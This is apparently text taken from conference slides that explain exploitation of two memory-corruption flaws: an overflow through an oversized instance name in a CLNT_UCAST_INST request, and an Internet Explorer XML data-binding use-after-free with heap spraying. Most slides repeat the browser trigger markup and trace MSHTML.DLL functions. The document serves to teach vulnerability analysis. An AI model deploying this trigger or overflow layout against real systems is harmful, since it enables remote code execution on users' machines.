  • 36. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 37. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 38. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 39. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 40. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 41. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 42. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow esp shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 43. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 44. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 45. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 46. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Trigger additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 47. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return address jump padding writable address Permutation additional entities padding overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 48. memory manipulation vulnerability lllllllloooooooonnnnnnnngggggggg 0x04 request instancename instancename return jump writable address padding address additional entities padding Exploitation overflow shellcode (injected into the stack) CLNT_UCAST_INST + [instancename >= 96 bytes] != NULL + additional entities = shellcode
  • 49.
  • 50.
  • 51. <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 52. memory manipulation vulnerability <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 53. memory manipulation vulnerability Internet Explorer (Data Consumers) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 54. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 55. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 56. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 57. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 58. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 59. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 60. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 61. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 62. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 63. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 64. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 65. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 66. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 67. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 68. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 69. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 70. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::CRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 71. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordConsumer::Bind DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 72. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CCurrentRecordInstance::GetCurrentRecordInstance DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 73. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CXfer::CreateBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 74. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataFld DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 75. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CElement::GetAAdataSrc DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 76. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CRecordInstance::AddBinding DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 77. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 CImplPtrAry::Append DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 78. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 XML Data Source Object #01 DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 79. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::TransferToDestination DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 80. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 81. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 82. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 83. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::RemoveBinding DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 84. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 _MemFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 85. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 HeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 86. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlFreeHeap DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 87. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 RtlpLowFragHeapFree DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 88. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CImplAry::Delete DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 89. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CRecordInstance::Detach DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 90. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 91. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 CXfer::TransferFromSrc DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 92. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 DATASRC DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 93. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 94. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
  • 95. memory manipulation vulnerability Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL (Data Consumers) (Binding Agent) Data Consumer #01 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t DATASRC DATAFLD Data Consumer #02 XML Data Source Object #02 0x0a0a0a0a DATAFLD shellcode eax (sprayed into the heap) <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
